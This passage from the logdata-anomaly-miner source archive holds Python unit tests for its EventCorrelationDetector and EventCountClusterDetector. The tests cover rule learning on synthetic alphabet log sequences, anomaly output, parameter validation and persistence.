[self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=["file:///tmp/syslog"]) @staticmethod def add_data(string, freq, total_freq): for i, x in enumerate(string): num = ord(x) total_freq[num] = total_freq.get(num, 0) + 1 if i == 0: key = -1 else: key = ord(string[i - 1]) freq[key] = freq.get(key, {}) freq[key][num] = freq[key].get(num, 0) + 1 freq[ord(string[len(string) - 1])] = freq.get(ord(string[len(string) - 1]), {}) freq[ord(string[len(string) - 1])][-1] = freq[ord(string[len(string) - 
1])].get(-1, 0) + 1 total_freq[-1] = total_freq.get(-1, 0) + 1 if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/EventCorrelationDetectorTest.py000066400000000000000000001551351500476301700320040ustar00rootroot00000000000000import unittest from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector, set_random_seed from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyFirstMatchModelElement, DummyMatchContext import time import random from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class EventCorrelationDetectorTest(TestBase): """Unittests for the EventCorrelationDetector.""" def test1receive_atom(self): """ Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ # check if perfect examples are learned with default parameters ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff5[:12000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff1[:12000]) # the generation_probability and generation_factor are set to 0.5 in the first case and 0.1 in the second case with the perfect examples. # the EventCorrelationDetector should still learn the rules as expected. 
ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.5, generation_factor=0.5, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff5[:30000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.5, generation_factor=0.5, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff1[:30000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.3, generation_factor=0.3, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff5[:100000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.3, generation_factor=0.3, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff1[:100000]) # examples with errors are used, but still should be learned with the default parameters. ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, learn_mode=True) self.run_ecd_test(ecd, self.errored_data_diff5[:12000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, learn_mode=True) self.run_ecd_test(ecd, self.errored_data_diff1[:12000]) # examples with errors are used, but still should be learned. These tests are using a higher generation_probability and generation_factor, because the data contains errors. 
ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.7, generation_factor=0.99, learn_mode=True) self.run_ecd_test(ecd, self.errored_data_diff5_low_error_rate[:25000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.7, generation_factor=0.99, learn_mode=True) self.run_ecd_test(ecd, self.errored_data_diff1_low_error_rate[:25000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.5, generation_factor=0.95, learn_mode=True) self.run_ecd_test(ecd, self.errored_data_diff5_low_error_rate[:40000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.5, generation_factor=0.95, learn_mode=True) self.run_ecd_test(ecd, self.errored_data_diff1_low_error_rate[:40000]) # p0 and alpha are chosen carefully to only find safe assumptions about the implications in the data. Therefor more iterations in the training phase are needed. 
ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=1.0, alpha=0.01, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff5[:20000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=1.0, alpha=0.01, learn_mode=True) self.run_ecd_test(ecd, self.errored_data_diff5_low_error_rate[:40000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=1.0, alpha=0.01, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff1[:20000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=1.0, alpha=0.01, learn_mode=True) self.run_ecd_test(ecd, self.errored_data_diff1_low_error_rate[:40000]) # p0 and alpha are chosen to approximately find sequences in log data. Therefor not as many iterations are needed to learn the rules. ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=0.7, alpha=0.1, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff5[:10000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=0.7, alpha=0.1, learn_mode=True) self.run_ecd_test(ecd, self.errored_data_diff5[:10000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=0.7, alpha=0.1, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff1[:10000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=0.7, alpha=0.1, learn_mode=True) self.run_ecd_test(ecd, self.errored_data_diff1[:10000]) # stop_learning_time ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, output_logline=False, stop_learning_time=100) t = time.time() match_context1 = 
DummyMatchContext(b" pid=") fdme1 = DummyFixedDataModelElement("s1", b" pid=") match_element1 = fdme1.get_match_element("", match_context1) match_context2 = DummyMatchContext(b"25537 uid=2") fdme2 = DummyFixedDataModelElement("d1", b"25537") match_element2 = fdme2.get_match_element("", match_context2) log_atom1 = LogAtom(fdme1.data, ParserMatch(match_element1), t, ecd) log_atom2 = LogAtom(match_context2.match_data, ParserMatch(match_element2), t, ecd) self.assertTrue(ecd.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(ecd.receive_atom(log_atom1)) self.assertTrue(ecd.learn_mode) log_atom1.atom_time = t + 101 self.assertTrue(ecd.receive_atom(log_atom1)) self.assertFalse(ecd.learn_mode) def test2do_timer(self): """Test if the do_timer method is implemented properly.""" ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler]) t = time.time() ecd.next_persist_time = t + 400 self.assertEqual(ecd.do_timer(t + 200), 200) self.assertEqual(ecd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(ecd.do_timer(t + 999), 1) self.assertEqual(ecd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3allowlist_event(self): """Test if the allowlist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler]) analysis = "Analysis.%s" self.assertRaises(Exception, ecd.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The EventCorrelationDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, ecd.allowlist_event, analysis % ecd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. 
self.assertEqual(ecd.allowlist_event(analysis % ecd.__class__.__name__, "/s1", None), "Allowlisted path %s in %s." % ("/s1", analysis % ecd.__class__.__name__)) self.assertEqual(ecd.constraint_list, ["/s1"]) ecd.learn_mode = False self.assertEqual(ecd.allowlist_event(analysis % ecd.__class__.__name__, "/d1", None), "Allowlisted path %s in %s." % ("/d1", analysis % ecd.__class__.__name__)) self.assertEqual(ecd.constraint_list, ["/s1", "/d1"]) def test4blocklist_event(self): """Test if the blocklist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler]) analysis = "Analysis.%s" self.assertRaises(Exception, ecd.blocklist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The EventCorrelationDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, ecd.blocklist_event, analysis % ecd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(ecd.blocklist_event(analysis % ecd.__class__.__name__, "/s1", None), "Blocklisted path %s in %s." % ("/s1", analysis % ecd.__class__.__name__)) self.assertEqual(ecd.ignore_list, ["/s1"]) ecd.learn_mode = False self.assertEqual(ecd.blocklist_event(analysis % ecd.__class__.__name__, "/d1", None), "Blocklisted path %s in %s." 
% ("/d1", analysis % ecd.__class__.__name__)) self.assertEqual(ecd.ignore_list, ["/s1", "/d1"]) def test5persistence(self): """Test the do_persist and load_persistence_data methods.""" ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, learn_mode=True) self.run_ecd_test(ecd, self.perfect_data_diff5[:12000]) ecd.do_persist() with open(ecd.persistence_file_name, "r") as f: self.assertEqual(f.read(), '[["string:back", ["string:parser/first/a"], ["string:parser/first/z"], 500, 500], ["string:back", ["string:parser/first/b"], ["string:parser/first/a"], 500, 500], ["string:back", ["string:parser/first/c"], ["string:parser/first/b"], 500, 500], ["string:back", ["string:parser/first/d"], ["string:parser/first/c"], 500, 500], ["string:back", ["string:parser/first/e"], ["string:parser/first/d"], 500, 500], ["string:back", ["string:parser/first/f"], ["string:parser/first/e"], 500, 500], ["string:back", ["string:parser/first/g"], ["string:parser/first/f"], 500, 500], ["string:back", ["string:parser/first/h"], ["string:parser/first/g"], 500, 500], ["string:back", ["string:parser/first/i"], ["string:parser/first/h"], 500, 500], ["string:back", ["string:parser/first/j"], ["string:parser/first/i"], 500, 500], ["string:back", ["string:parser/first/k"], ["string:parser/first/j"], 500, 500], ["string:back", ["string:parser/first/l"], ["string:parser/first/k"], 500, 500], ["string:back", ["string:parser/first/m"], ["string:parser/first/l"], 500, 500], ["string:back", ["string:parser/first/n"], ["string:parser/first/m"], 500, 500], ["string:back", ["string:parser/first/o"], ["string:parser/first/n"], 500, 500], ["string:back", ["string:parser/first/p"], ["string:parser/first/o"], 500, 500], ["string:back", ["string:parser/first/q"], ["string:parser/first/p"], 500, 500], ["string:back", ["string:parser/first/r"], ["string:parser/first/q"], 500, 500], ["string:back", ["string:parser/first/s"], ["string:parser/first/r"], 500, 
500], ["string:back", ["string:parser/first/t"], ["string:parser/first/s"], 500, 500], ["string:back", ["string:parser/first/u"], ["string:parser/first/t"], 500, 500], ["string:back", ["string:parser/first/v"], ["string:parser/first/u"], 500, 500], ["string:back", ["string:parser/first/w"], ["string:parser/first/v"], 500, 500], ["string:back", ["string:parser/first/x"], ["string:parser/first/w"], 500, 500], ["string:back", ["string:parser/first/y"], ["string:parser/first/x"], 500, 500], ["string:back", ["string:parser/first/z"], ["string:parser/first/y"], 500, 500], ["string:forward", ["string:parser/first/a"], ["string:parser/first/b"], 500, 500], ["string:forward", ["string:parser/first/b"], ["string:parser/first/c"], 500, 500], ["string:forward", ["string:parser/first/c"], ["string:parser/first/d"], 500, 500], ["string:forward", ["string:parser/first/d"], ["string:parser/first/e"], 500, 500], ["string:forward", ["string:parser/first/e"], ["string:parser/first/f"], 500, 500], ["string:forward", ["string:parser/first/f"], ["string:parser/first/g"], 500, 500], ["string:forward", ["string:parser/first/g"], ["string:parser/first/h"], 500, 500], ["string:forward", ["string:parser/first/h"], ["string:parser/first/i"], 500, 500], ["string:forward", ["string:parser/first/i"], ["string:parser/first/j"], 500, 500], ["string:forward", ["string:parser/first/j"], ["string:parser/first/k"], 500, 500], ["string:forward", ["string:parser/first/k"], ["string:parser/first/l"], 500, 500], ["string:forward", ["string:parser/first/l"], ["string:parser/first/m"], 500, 500], ["string:forward", ["string:parser/first/m"], ["string:parser/first/n"], 500, 500], ["string:forward", ["string:parser/first/n"], ["string:parser/first/o"], 500, 500], ["string:forward", ["string:parser/first/o"], ["string:parser/first/p"], 500, 500], ["string:forward", ["string:parser/first/p"], ["string:parser/first/q"], 500, 500], ["string:forward", ["string:parser/first/q"], ["string:parser/first/r"], 500, 
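500], ["string:forward", ["string:parser/first/r"], ["string:parser/first/s"], 500, 500], ["string:forward", ["string:parser/first/s"], ["string:parser/first/t"], 500, 500], ["string:forward", ["string:parser/first/t"], ["string:parser/first/u"], 500, 500], ["string:forward", ["string:parser/first/u"], ["string:parser/first/v"], 500, 500], ["string:forward", ["string:parser/first/v"], ["string:parser/first/w"], 500, 500], ["string:forward", ["string:parser/first/w"], ["string:parser/first/x"], 500, 500], ["string:forward", ["string:parser/first/x"], ["string:parser/first/y"], 500, 500], ["string:forward", ["string:parser/first/y"], ["string:parser/first/z"], 500, 500], ["string:forward", ["string:parser/first/z"], ["string:parser/first/a"], 500, 500]]')
        # A second detector built from the same config must expose the same rules, rule by rule
        # (presumably loaded from the persistence written above - the setup is outside this view).
        other = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, learn_mode=True)
        for key in ecd.back_rules.keys():
            for i in range(len(ecd.back_rules[key])):
                self.assertEqual(ecd.back_rules[key][i].trigger_event, other.back_rules[key][i].trigger_event)
                self.assertEqual(ecd.back_rules[key][i].implied_event, other.back_rules[key][i].implied_event)
                self.assertEqual(ecd.back_rules[key][i].max_observations, other.back_rules[key][i].max_observations)
                self.assertEqual(ecd.back_rules[key][i].min_eval_true, other.back_rules[key][i].min_eval_true)
        for key in ecd.forward_rules.keys():
            for i in range(len(ecd.forward_rules[key])):
                self.assertEqual(ecd.forward_rules[key][i].trigger_event, other.forward_rules[key][i].trigger_event)
                self.assertEqual(ecd.forward_rules[key][i].implied_event, other.forward_rules[key][i].implied_event)
                self.assertEqual(ecd.forward_rules[key][i].max_observations, other.forward_rules[key][i].max_observations)
                self.assertEqual(ecd.forward_rules[key][i].min_eval_true, other.forward_rules[key][i].min_eval_true)

    def test6validate_parameters(self):
        """Test all initialization parameters for the detector.

        Input parameters must be validated in the class. Each parameter is exercised the same way:
        values of the wrong type must raise TypeError, values of the right type but outside the
        allowed range must raise ValueError, and a few valid values must construct a detector.
        The parameters are grouped by the kind of value they accept so that every parameter of one
        kind is checked against exactly the same set of bad inputs.
        """
        # Bad inputs per parameter kind. The order within each tuple is the order the checks run in.
        positive_int_bad = (100.22, b"Default", "123", {"id": "Default"}, ["Default"], [], (), set())
        positive_number_bad = (b"Default", "123", {"id": "Default"}, ["Default"], [], (), set())
        bool_bad = (b"True", "True", 123, 123.22, {"id": "Default"}, ["Default"], [], (), set())
        str_list_bad = ("", b"Default", True, 123, 123.3, {"id": "Default"}, (), set())

        def rejects(exc, **kwargs):
            # Constructing the detector with these keyword arguments must raise exc.
            self.assertRaises(exc, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], **kwargs)

        def accepts(**kwargs):
            # Constructing the detector with these keyword arguments must succeed.
            EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], **kwargs)

        def check_positive_int(name):
            # int > 0: negative and zero are out of range, floats and non-numbers are the wrong type.
            rejects(ValueError, **{name: -1})
            rejects(ValueError, **{name: 0})
            for bad in positive_int_bad:
                rejects(TypeError, **{name: bad})
            accepts(**{name: 100})

        def check_positive_number(name, **extra):
            # int or float > 0; extra keyword arguments are passed along with every call
            # (used for the stop_learning_* parameters, which are only valid with learn_mode=True).
            rejects(ValueError, **{name: -1, **extra})
            rejects(ValueError, **{name: 0, **extra})
            for bad in positive_number_bad:
                rejects(TypeError, **{name: bad, **extra})
            accepts(**{name: 100, **extra})
            accepts(**{name: 100.22, **extra})

        def check_unit_interval(name):
            # number in [0, 1] inclusive.
            rejects(ValueError, **{name: -1})
            rejects(ValueError, **{name: 1.1})
            for bad in positive_number_bad:
                rejects(TypeError, **{name: bad})
            accepts(**{name: 0})
            accepts(**{name: 0.5})
            accepts(**{name: 1})

        def check_bool(name):
            # strictly bool: strings, numbers and containers are rejected.
            for bad in bool_bad:
                rejects(TypeError, **{name: bad})
            accepts(**{name: True})

        def check_str_list(name):
            # list of non-empty strings, or None / empty list.
            rejects(ValueError, **{name: [""]})
            for bad in str_list_bad:
                rejects(TypeError, **{name: bad})
            accepts(**{name: []})
            accepts(**{name: None})

        # anomaly_event_handlers (positional): anything that is not a list of handlers is rejected.
        for bad in (["default"], None, "", b"Default", True, 123, 123.3, {"id": "Default"}, (), set()):
            self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, bad)

        check_str_list("target_path_list")
        check_positive_int("max_hypotheses")
        check_positive_number("hypothesis_max_delta_time")
        check_unit_interval("generation_probability")
        check_unit_interval("generation_factor")
        check_positive_int("max_observations")
        check_unit_interval("p0")
        check_unit_interval("alpha")
        check_positive_int("candidates_size")
        check_positive_number("hypotheses_eval_delta_time")
        check_positive_number("delta_time_to_discard_hypothesis")
        check_bool("check_rules_flag")
        check_bool("learn_mode")
        check_str_list("ignore_list")

        # persistence_id: non-empty str only.
        rejects(ValueError, persistence_id="")
        for bad in (None, b"Default", True, 123, 123.22, {"id": "Default"}, ["Default"], [], (), set()):
            rejects(TypeError, persistence_id=bad)
        accepts(persistence_id="Default")

        # output_logline: bool only; None is not accepted as a default here.
        for bad in (None,) + bool_bad:
            rejects(TypeError, output_logline=bad)
        accepts(output_logline=True)

        check_str_list("constraint_list")

        # Learning stop conditions are only meaningful in learn_mode and are mutually exclusive.
        check_positive_number("stop_learning_time", learn_mode=True)
        check_positive_number("stop_learning_no_anomaly_time", learn_mode=True)
        rejects(ValueError, learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100)

        # log_resource_ignore_list: entries must be resource URLs (file://...), not bare paths.
        rejects(ValueError, log_resource_ignore_list=["/tmp/syslog"])
        for bad in ("", b"Default", True, 123, 123.22, {"id": "Default"}, (), set()):
            rejects(TypeError, log_resource_ignore_list=bad)
        accepts(log_resource_ignore_list=["file:///tmp/syslog"])

    @classmethod
    def setUpClass(cls):
        """Set up the shared alphabet parser model and the generated log data for all tests."""
        cls.alphabet = b"abcdefghijklmnopqrstuvwxyz"
        cls.analysis = "Analysis.%s"
        # One fixed-string child per letter; the first-match element dispatches on the letter.
        children = []
        for val in cls.alphabet:
            char = bytes([val])
            children.append(DummyFixedDataModelElement(char.decode(), char))
        cls.alphabet_model = DummyFirstMatchModelElement("first", children)
        # Seed BEFORE generating the errored data sets: generate_errored_data picks the
        # out-of-sequence characters with random.uniform(), so seeding only after generation
        # left the fixtures - and therefore the detection results - non-deterministic between
        # runs. Assumes set_random_seed() seeds Python's random module - TODO confirm in aminer.util.
        set_random_seed(42)
        error_rate = 0.000085
        cls.perfect_data_diff5 = cls.generate_perfect_data(cls, 30000, 5)
        cls.perfect_data_diff1 = cls.generate_perfect_data(cls, 30000, 1)
        cls.errored_data_diff5 = cls.generate_errored_data(cls, 100000, 5, error_rate)
        cls.errored_data_diff1 = cls.generate_errored_data(cls, 100000, 1, error_rate)
        cls.errored_data_diff5_low_error_rate = cls.generate_errored_data(cls, 100000, 5, error_rate / 2.5)
        cls.errored_data_diff1_low_error_rate = \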
cls.generate_errored_data(cls, 100000, 1, error_rate / 2.5)
        # NOTE(review): this seed is applied after the data sets above were generated, so the
        # random error positions chosen in generate_errored_data are not covered by it.
        set_random_seed(42)

    def check_rules(self, sorted_back_rules, sorted_forward_rules, diff):
        """Check if the rules are as expected.

        For every path there must be exactly 5 / diff rules, and the implied events must be the
        alphabet neighbours of the trigger event: the following letters for forward rules, the
        preceding letters for back rules (wrapping around at the end of the alphabet).
        """
        alphabet_len = len(self.alphabet)

        def last_path_component(event):
            # Event paths look like "parser/first/<letter>"; the letter is the alphabet entry.
            return event[0].split("/")[-1].encode()

        def assert_neighbour_rules(rules, direction):
            self.assertEqual(len(rules), 5 / diff)
            trigger = b""
            implied_positions = []
            for rule in rules:
                trigger = last_path_component(rule.trigger_event)
                implied_positions.append(self.alphabet.index(last_path_component(rule.implied_event)))
            # NOTE(review): range(1, len(rules)) only checks offsets 1 .. len(rules) - 1, so the
            # last neighbour (offset 5 / diff) is never asserted here - TODO confirm whether
            # len(rules) + 1 was intended; check_anomaly_detection does cover that offset.
            for offset in range(1, len(rules)):
                expected = (self.alphabet.index(trigger) + direction * offset) % alphabet_len
                self.assertIn(expected, implied_positions)

        for path in sorted_forward_rules:
            assert_neighbour_rules(sorted_forward_rules[path], 1)
        for path in sorted_back_rules:
            assert_neighbour_rules(sorted_back_rules[path], -1)

    def check_anomaly_detection(self, ecd, t, diff):
        """Check if anomalies were detected as expected.

        Every letter is fed to the detector twice in isolation (outside the learned sequence);
        the detector must then report the 5 / diff preceding and following letters as missing,
        and must not report any letter further away than that.
        """
        window = int(5 / diff)
        alphabet_len = len(self.alphabet)
        relations = {"precede": -1, "follow": 1}
        for value in self.alphabet:
            self.reset_output_stream()
            char = bytes([value])
            parser_match = ParserMatch(self.alphabet_model.get_match_element("parser", DummyMatchContext(char)))
            # The second atom is needed so that the follow anomalies of the first one are evaluated.
            for _ in range(2):
                t += 5 * 3
                ecd.receive_atom(LogAtom(char, parser_match, t, self.__class__.__name__))
            output = self.output_stream.getvalue()
            position = self.alphabet.index(char)
            for relation, direction in relations.items():
                for offset in range(1, alphabet_len):
                    neighbour = repr(bytes([self.alphabet[(position + direction * offset) % alphabet_len]]))
                    message = "Event %s is missing, but should %s event %s" % (neighbour, relation, repr(char))
                    if offset <= window:
                        self.assertIn(message, output)
                    else:
                        self.assertNotIn(message, output)

    def run_ecd_test(self, ecd, log_atoms):
        """Run the ECD test.

        Feed all log atoms into the detector in learn mode, verify the learned forward and back
        rules, then switch learning off and verify the anomaly output. The time step between
        atoms is taken from the first two atoms.
        """
        diff = log_atoms[1].atom_time - log_atoms[0].atom_time
        last_atom = None
        for last_atom in log_atoms:
            ecd.receive_atom(last_atom)
        expected_paths = len(self.alphabet_model.children)
        forward_rules = dict(sorted(ecd.forward_rules.items()))
        back_rules = dict(sorted(ecd.back_rules.items()))
        self.assertEqual(expected_paths, len(forward_rules))
        self.assertEqual(expected_paths, len(back_rules))
        self.check_rules(back_rules, forward_rules, diff)
        ecd.learn_mode = False
        self.check_anomaly_detection(ecd, last_atom.atom_time, diff)

    def generate_perfect_data(self, iterations, diff):
        """Generate data without any error."""
        log_atoms = []
        t = time.time()
        for i in range(1, iterations+1):
            char = bytes([self.alphabet[i % len(self.alphabet)]])
            parser_match = \
ParserMatch(self.alphabet_model.get_match_element("parser", DummyMatchContext(char))) t += diff log_atoms.append(LogAtom(char, parser_match, t, self.__class__.__name__)) return log_atoms def generate_errored_data(self, iterations, diff, error_rate): """Generate data with errors according to the error_rate.""" log_atoms = [] t = time.time() divisor = 1 while error_rate * divisor < 1: divisor = divisor * 10 err = divisor * error_rate divisor //= err for i in range(1, iterations+1): if i % divisor == 0 and i != 0: char = bytes([self.alphabet[int(i + random.uniform(diff+1, len(self.alphabet))) % len(self.alphabet)]]) else: char = bytes([self.alphabet[i % len(self.alphabet)]]) parser_match = ParserMatch(self.alphabet_model.get_match_element("parser", DummyMatchContext(char))) t += diff log_atoms.append(LogAtom(char, parser_match, t, self.__class__.__name__)) return log_atoms if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/EventCountClusterDetectorTest.py000066400000000000000000001254551500476301700321570ustar00rootroot00000000000000import unittest import time from datetime import datetime from aminer.analysis.EventCountClusterDetector import EventCountClusterDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class EventCountClusterDetectorTest(TestBase): """Unittests for the EventFrequencyDetector.""" def test1receive_atom(self): """ This test checks the normal operation of EventCountClusterDetector. Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. 
""" t = time.time() expected_string = '%s Frequency anomaly detected\n%s: "None" (%d lines)\n %s\n\n' dtf = "%Y-%m-%d %H:%M:%S" # The following log atoms are created: # window 1: # value a: 1 time by x, 1 time by y # value b: 1 time by x # window 2: # value a: 2 times by x, 1 time by y # value b: 1 time by x # window 3: # value b: 1 time by x # value c: 1 time by x # window 4: # value a: 1 time by x # Start of window 1: m1 = MatchElement("/p/value", b"a", b"a", None) m2 = MatchElement("/p/id", b"x", b"x", None) log_atom1 = LogAtom(b"ax", ParserMatch(MatchElement("/p", b"ax", b"ax", [m1, m2])), t+1, None) m3 = MatchElement("/p/value", b"a", b"a", None) m4 = MatchElement("/p/id", b"y", b"y", None) log_atom2 = LogAtom(b"ay", ParserMatch(MatchElement("/p", b"ay", b"ay", [m3, m4])), t+2, None) m5 = MatchElement("/p/value", b"b", b"b", None) m6 = MatchElement("/p/id", b"x", b"x", None) log_atom3 = LogAtom(b"bx", ParserMatch(MatchElement("/p", b"bx", b"bx", [m5, m6])), t+3, None) # Start of window 2: m7 = MatchElement("/p/value", b"a", b"a", None) m8 = MatchElement("/p/id", b"x", b"x", None) log_atom4 = LogAtom(b"ax", ParserMatch(MatchElement("/p", b"ax", b"ax", [m7, m8])), t+13, None) m9 = MatchElement("/p/value", b"a", b"a", None) m10 = MatchElement("/p/id", b"y", b"y", None) log_atom5 = LogAtom(b"ay", ParserMatch(MatchElement("/p", b"ay", b"ay", [m9, m10])), t+14, None) m11 = MatchElement("/p/value", b"b", b"b", None) m12 = MatchElement("/p/id", b"x", b"x", None) log_atom6 = LogAtom(b"bx", ParserMatch(MatchElement("/p", b"bx", b"bx", [m11, m12])), t+15, None) m13 = MatchElement("/p/value", b"a", b"a", None) m14 = MatchElement("/p/id", b"x", b"x", None) log_atom7 = LogAtom(b"ax", ParserMatch(MatchElement("/p", b"ax", b"ax", [m13, m14])), t+16, None) # Start of window 3: m15 = MatchElement("/p/value", b"c", b"c", None) m16 = MatchElement("/p/id", b"x", b"x", None) log_atom8 = LogAtom(b"cx", ParserMatch(MatchElement("/p", b"cx", b"cx", [m15, m16])), t+23, None) m17 = 
MatchElement("/p/value", b"b", b"b", None) m18 = MatchElement("/p/id", b"x", b"x", None) log_atom9 = LogAtom(b"bx", ParserMatch(MatchElement("/p", b"bx", b"bx", [m17, m18])), t+24, None) # Start of window 4: m19 = MatchElement("/p/value", b"a", b"a", None) m20 = MatchElement("/p/id", b"x", b"x", None) log_atom10 = LogAtom(b"ax", ParserMatch(MatchElement("/p", b"ax", b"ax", [m19, m20])), t+43, None) eccd = EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["/p/value"], id_path_list=["/p/id"], window_size=10, num_windows=50, confidence_factor=0.5, idf=True, norm=False, add_normal=False, check_empty_windows=False, learn_mode=True, output_logline=False) # Forward log atoms to detector eccd.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") eccd.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") eccd.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") eccd.receive_atom(log_atom4) # End of first time window; first count vector triggers anomaly for x self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 13).strftime(dtf), eccd.__class__.__name__, 1, "ax")) self.reset_output_stream() eccd.receive_atom(log_atom5) # End of first time window; first count vector triggers anomaly for y self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 14).strftime(dtf), eccd.__class__.__name__, 1, "ay")) self.reset_output_stream() eccd.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), "") eccd.receive_atom(log_atom7) self.assertEqual(self.output_stream.getvalue(), "") eccd.receive_atom(log_atom8) # No anomaly reported for x since 2 times a and 1 time b (window 1) is similar enough to 1 time a and 1 time b (window 2) self.assertEqual(self.output_stream.getvalue(), "") eccd.receive_atom(log_atom9) self.assertEqual(self.output_stream.getvalue(), "") 
eccd.receive_atom(log_atom10) # Check learned count vectors at end of third time window # For x, count vector from first and third windows are included in model; for y only first window self.assertEqual(eccd.known_counts, {("x",): [{("a",): 1, ("b",): 1}, {("c",): 1, ("b",): 1}], ("y",): [{("a",): 1}]}) # Since a occurs in both x and y, its idf factor is only 0.176 (=log10(3/2)), # compared to b and c which have an idf factor of 0.477 (=log10(3/1)). # Comparing the count vectors for x in the first and third window, we see that # a occurs only in first window, which increases diff to 0.176/0.176 # b occurs once in first and third windows, which updates diff to 0.176/0.653 # c occurs only in third window, which increases diff to 0.653/1.13 # The final score is thus 0.653/1.13=0.578, which exceeds the threshold of 0.5. self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 43).strftime(dtf), eccd.__class__.__name__, 1, "ax")) # stop_learning_time eccd = EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["/p/value"], id_path_list=["/p/id"], window_size=10, num_windows=50, confidence_factor=0.5, idf=True, norm=False, add_normal=False, check_empty_windows=False, learn_mode=True, output_logline=False, stop_learning_time=100) self.assertTrue(eccd.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(eccd.receive_atom(log_atom1)) self.assertTrue(eccd.learn_mode) log_atom1.atom_time = t + 102 